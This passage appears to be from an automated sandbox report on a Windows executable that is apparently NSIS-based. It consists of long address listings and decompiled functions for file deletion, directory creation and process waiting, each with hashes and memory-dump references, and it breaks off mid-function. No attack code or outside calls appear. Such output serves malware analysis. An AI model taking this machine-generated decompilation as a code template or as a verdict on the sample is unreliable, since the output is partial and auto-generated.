                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040726d
                                  0x0040726a

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                  • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                  • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                  • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405BCB Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 41%
                                  			E00405BCB(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00405FD2(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                  0x00405bcc
                                  0x00405bd7
                                  0x00405bdc
                                  0x00405c0c
                                  0x00000000
                                  0x00405c0c
                                  0x00405be3
                                  0x00405be4
                                  0x00405bee
                                  0x00405be6
                                  0x00405be6
                                  0x00405be6
                                  0x00405bf6
                                  0x00405c02
                                  0x00405c06
                                  0x00405c06
                                  0x00000000
                                  0x00405bf8
                                  0x00000000
                                  0x00405bfa

                                  APIs
                                    • Part of subcall function 00405FD2: GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                    • Part of subcall function 00405FD2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405FEB
                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DAD), ref: 00405BE6
                                  • DeleteFileW.KERNEL32(?,?,?,00000000,00405DAD), ref: 00405BEE
                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C06
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                  • String ID:
                                  • API String ID: 1655745494-0
                                  • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                  • Instruction ID: 9515068513ade5ae1f55316d2df80b31020678a3208768e1cfdcfcd0005f1fec
                                  • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                  • Instruction Fuzzy Hash: 98E0E53110CB915AD21067348D08B5F7AE8EF86314F04093AF891F10C0D7789807CA7A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040697F Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040697F(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406910(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                  0x00406990
                                  0x004069a7
                                  0x0040699b
                                  0x004069a5
                                  0x004069a5
                                  0x004069b2
                                  0x004069be

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
                                  • GetExitCodeProcess.KERNELBASE ref: 004069B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ObjectSingleWait$CodeExitProcess
                                  • String ID:
                                  • API String ID: 2567322000-0
                                  • Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                  • Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
                                  • Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                  • Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406507(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                  0x004015c1
                                  0x004015c9
                                  0x004015cc
                                  0x004015d1
                                  0x004015d5
                                  0x004015d7
                                  0x004015df
                                  0x004015e1
                                  0x004015e4
                                  0x004015ea
                                  0x00401604
                                  0x00401607
                                  0x004015ec
                                  0x004015ec
                                  0x004015ef
                                  0x00000000
                                  0x004015fa
                                  0x004015fd
                                  0x004015fd
                                  0x004015ef
                                  0x0040160e
                                  0x00401615
                                  0x00401624
                                  0x00401624
                                  0x00401617
                                  0x0040161a
                                  0x00401622
                                  0x00000000
                                  0x00000000
                                  0x00401622
                                  0x00401615
                                  0x00401627
                                  0x0040162b
                                  0x0040162c
                                  0x004015d7
                                  0x00401634
                                  0x00401663
                                  0x004022f1
                                  0x00401636
                                  0x00401638
                                  0x00401645
                                  0x0040164d
                                  0x00401655
                                  0x0040165b
                                  0x0040165b
                                  0x00401655
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                    • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                    • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                  • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                  • String ID:
                                  • API String ID: 1892508949-0
                                  • Opcode ID: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                                  • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                  • Opcode Fuzzy Hash: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
                                  • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
